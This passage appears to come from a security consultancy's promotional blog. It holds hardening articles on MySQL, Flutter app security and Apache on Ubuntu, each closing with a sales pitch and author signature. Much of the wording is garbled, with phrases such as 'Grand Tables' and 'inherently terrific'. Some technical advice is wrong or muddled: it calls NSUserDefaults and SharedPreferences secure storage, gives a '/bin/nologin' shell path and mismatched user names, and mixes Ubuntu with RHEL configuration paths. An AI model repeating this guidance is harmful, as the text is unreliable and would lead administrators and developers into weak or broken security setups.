    If built as a standalone server, MySQL should be configured to only access some permitted hosts. This can be fulfilled by making the appropriate changes in the hosts. deny and host the files.
  • Do Not Run MySQL With Root Level Privileges:
    MySQL should be working under a specific, newly-built user account with the exact permissions to run the service, as opposed to straight as the root user. This will help with some auditing and logging benefits while preventing hackers from gaining access by hijacking the user account.

How To Remove Wildcards In The Grand Tables?

The MySQL accessing control system works through a series of so-called grant tables, which make it possible to explain access levels for each user at the database, table and column level. While these tables do access administrators to set blanket instructions for a user or set of tables using wildcards, doing so is inherently terrific because an attacker could use a single compromised account to gain access to other parts of the system. For these types of reasons, be precise when accessing users’ privileges and always ensure that users have only as much access as they need to perform their acts. In instantly, be wary of assigning the great privilege to individual users, as this level allows users to change basic server configuration and access all databases.

How To Require The Use Of A Secure Password?

User accounts are only as secure and safe as the passwords used to protect them. For this reason, the very first thing you should do when you download MySQL is assign a secure password to the MySQL root account. Once you've closed this hole, the next step is to require that every user account must have a secure password and ensure that safe passwords do not use simply-understandable heuristics such as birthdays, user names or dictionary words.

How To Check The Permission Of Configuration Files?

Simply often, to make server connections speedy and more convenient, both users and the server administrators store their user account passwords in their single-user MySQL options file. However, this password is stored in the normal text within the file and can easily be gotten. Therefore, it's important to ensure that such single-user configuration files are not seen by other users of the system, and are stored in private locations. Importantly, you'd want the single-user configuration to be stored in the user's home directory with permissions.

How To Encrypt Client-Server Transmission?

A most important issue in the MySQL client-server architecture involves the security and safety of data being transmitted over the network. If client-server transactions take place in plaintext, it is possible for a hacker to attack the data packets being transmitted and thus lead access to private information. You can close this hole either by enabling SSL in your MySQL by using a secure shell utility like OpenSSH to create a secure and safe encrypted for your data to run through. Encrypting your client-server connection in this manner makes it very hard for undesired users to read the data going back and forth.

How To Disable Remote Access?

If the single users don't need to access the server locally, you can drastically reduce the risk of a network attack by forcing all MySQL connections to take place through the UNIX socket file. This is accomplished by running the server with the --skip-networking option. Doing this blocks TCP/IP network connections to MySQL and makes sure that no user can remotely connect to the system.

How To Actively Monitor The Mysql Access Log?

MySQL comes with a number of various log files, which keep track of client connections, queries and server errors. Of these, the most important is the common query log, which logs each client connection or disconnection with a timestamp, and also records each query made by a client. If you suspect unwanted activity, such as that associated with a network destroying attempt, it's a good thought to monitor this log to gain an understanding of the source of the activity.

Protecting the MySQL databases is always a time to time task, and so you shouldn't be at peace easily once you've done the steps above. Be super active in monitoring and updating the security of your system with cyber security consulting services provided by AirZero sec.

If you need MySQL database security services, and consultations against these serious cyber security attacks, feel free to contact us. AIRZERO SEC will be your strong digital security solution. E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:
www.linkedin.com/in/johnsontaugustine/

enter image description here

How To Make A Flutter App With High Security?

When it comes to app development, the biggest concern for developers and the customers that use the app is secured. Do you know most of the people who use digital media time is spent on mobiles and tablets? With this popularity in the usage of smartphones and applications, app security has become the most concern for developers and users. Today most apps fail to clear the mobile security and privacy risks and ultimately put everything at risk.

Here we are explaining how to make the flutter app secured and the security risks a Flutter app is facing:

What are the biggest app security risks?

  • Unauthorized access to your application:
    Giving access to the application without verifying the user’s identity is the biggest threat for security. Flutter can improve various security and authentication plugins in the app. By integrating a plugin, developers can simply and easily add an authentication check in an app.

  • Leaking of sensitive data:
    Nowadays mobile apps contain all kinds of sensitive information, from IDs, passwords, PINs, account details, and more. If an app lacks security then this data can be at risk. Flutter offers a secure safety and privacy storage plugin named asNSUserDefault for IOS and SharedPreferences for Android.

  • Code injections:
    Code injections are one of the most common attackers. They insert unauthorized code in an already existing source code. This can result in major issues like data loss or a total takeover of your application. Application developers can use Flutter plugins which come with instructions that are already inserted into the plugin code.

What are the reasons that startups are considering Flutter for mobile app development:

  • Flutter uses a single codebase for the platforms
  • Flutter provides faster coding with hot reloading
  • App testing can be faster with flutter
  • There are no license fees for flutter
  • Flutter can customize the app with the best design
  • Flutter can build the same UI for the old devices

Additional features of flutter framework:

  • Flutter is mainly known for its productivity and consistency as it has a portable GPU rendering UI that provides access that can work on multiple up-to-date interfaces.
  • Flutter apps are easy and simple to customize and localize, businesses leverage a wider global user base for flutter.
  • Flutter framework provides total support for a wide range of IDEs including Xcode, Android studio and more
  • Flutter is well machined and equipped with native ARM code which makes it more compatible and comfortable with developing enterprise-level apps.

Why should you Hire the best Flutter Mobile App Development Company?

If you are the one who has been searching and trying to invest in a cross-application and choosing a flutter framework for the development and you are concerned about the security of the app, then it is worth choosing a best flutter app development company. The reason is, they are backed by highly eligible developers with the knowledge of the right plugins and understand the importance of integrating completely approved plugins into the app to avoid compromising the security and privacy of the information.

The best part about choosing the best app company with the best cyber security provider is, they follow the proper plan of the app development process and always ensure you the perfect product quality and security by keeping in mind the security and safety is the important part of the app.

Conclusion

No matter how complex and difficult your app is and what framework you have chosen to develop an application, security and privacy is the major concern for any developer that develops apps. So it is worth sparing some time reading all about common yet main security risks of applications and how you can address them with main flutter plugins. To avoid consequences, it is worth partnering with the best cyber security company in Kerala, Airzero Sec to build your app with tighter security.

Since the usage of the application will continue to increase and problems of the app will also rise, but being a developer- it’s your responsibility to ensure safety to the user by simply increasing the security and safety of the app and making sure that details will remain safe.

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/
Email id: [email protected]

enter image description here

Before we enter into the mentioned topic, first we have to know about some common topics like installation of apache and some basic concepts so let’s start with the installation.

How to install apache on ubuntu?

This section will help you to install an apache web server on the Ubuntu operating system.

Before beginning your work:

  • Running Ubuntu system with privileges shell access
  • Complete initial instructions for server setup
  • Needed a domain name registered and pointed to your server’s public IP address

Step 1 — Installing Apache

Apache is available under the default software repositories on Ubuntu. You can simply install it using the conventional package management tool. Firstly, update the local package to reflect the latest upstream changes. Then install Apache webserver. After the confirmation you are given, apt will install Apache and other required and essential things on your system.

Step 2 — Test Your Web Server

After the installation is finished, the Apache service will automatically start on your system. You can find the Apache status by running the following command:

$ sudo systemctl status apache

After running the command prompt. The status like “Active: active (running)” means Apache service has started right. However, the best way to test a web server, request a page from Apache in a web browser. You will see the Apache landing page while you test in the web browser. It means the Apache web server is running correctly on your system.

OK! Next, we need to know how to secure apache in Ubuntu. Ok follow this article, there will be some tips to strengthen your security in the apache web server.

Tips To Strengthen Your Apache Web Server Security:

  • Make an apache version and os identity from errors
  • Disable directory listing
  • Keep updating Apache regularly
  • Disable unnecessary modules
  • Run apache as a separate user and group
  • Use allow and deny to restrict access to directories

How To Make Apache Version And Os Identity From Errors?

When you download Apache with other package installers like yum, it displays what version is your Apache web server installed on your server with the Operating system name of your server in Errors. It also shows the details about Apache modules installed on your server.

Now you can see that Apache is showing what version it is with Ubuntu installed in your server. This can be a major security problem to your web server as well as your Linux box too. To protect Apache from displaying this information to the world, we need to make some changes in Apache’s main configuration file.

Open the configuration file and search for “ServerSignature“, it’s by default it will be On. So next we need to Off these server signatures and the second line “ServerTokens Prod” tells Apache to return only Apache as a thing in the server response header on every page request, It suppresses the Ubuntu, major, and minor version info.

How to disable directory listing?

By default, Apache lists the content of the document root directory in the absence of an index file. We can turn off directory listing by using the Options directive in the configuration file for a specific directory. For that, we need to make a way in httpd. Conf file...

How To Keep Updating Apache Regularly?

Apache developers are continuously working on security problems and releasing their updated version with a variety of security options. So It is always recommended to use the new version of Apache as your web server.

To check which Apache version you used: You can check your current version with httpd -v command.

How To Disable Unnecessary Modules?

It’s always good to reduce the chances of being a victim of any cyber attack. So it’s recommended to remove all those modules that are not in use often. You can list all the compiled modules of the webserver, using the following command.

# grep LoadModule /etc/httpd/conf/httpd.conf

# have to place corresponding `LoadModule' lines at this location so the

# LoadModule foo_module modules/mod_foo.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_alias_module modules/mod_authn_alias.so
LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule ldap_module modules/mod_ldap.so
LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule logio_module modules/mod_logio.so
LoadModule env_module modules/mod_env.so
LoadModule ext_filter_module modules/mod_ext_filter.so

Above is the list that is removed by default but often not needed: mod_imap, mod_include, mod_info, mod_userdir, mod_autoindex. To disable this module, you can insert a “#” at the beginning of that line and restart the server service.

How To Run Apache As A Separate User And Group?

With an automatic installation, Apache builds its process with user nobody or daemon. For security reasons, it is suggested to run Apache in its own non-privileged account. For example: HTTP-web.

Create Apache User and Group

# groupadd http-web
# useradd -d /var/www/ -g http-web -s /bin/nologin http-web

Now you want to tell Apache to run with this user and to do so, we need to make a way in /etc/httpd/conf/httpd.conf and restart the server service.

Open /etc/httpd/conf/httpd.conf with the editor and search for keywords “User” and “Group” and there you will want to specify the username and group name to use.

User HTTP-web
Group HTTP-web

How to use allow and deny to restrict access to directories?

So we can restrict the access to directories with “Allow” and “Deny” options in httpd.conf file. Here in the below example, we’ll be safeguarding the root directory, for that by setting the following in the httpd.conf file.

<Directory />
Options None
Order deny,allow
Deny from all
</Directory>
  • Options “None” – not allow users to enable any optional features.
  • Order deny, allow – Used to “Deny” and “Allow” directives will be processed. Here it will first “deny” and next “allow”.
  • Deny from all – deny the request from everybody to the root directory, nobody will be able to access the root directory.

The best cyber security consulting company will provide you with the cyber security provided solutions for your system to be a partner of the best cyber security service provider.

If you have any queries about this topic or have to get cybersecurity services and consultations against these serious cyber attacks. Feel free to contact us. AIRZERO SEC will always be your strong firewall. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/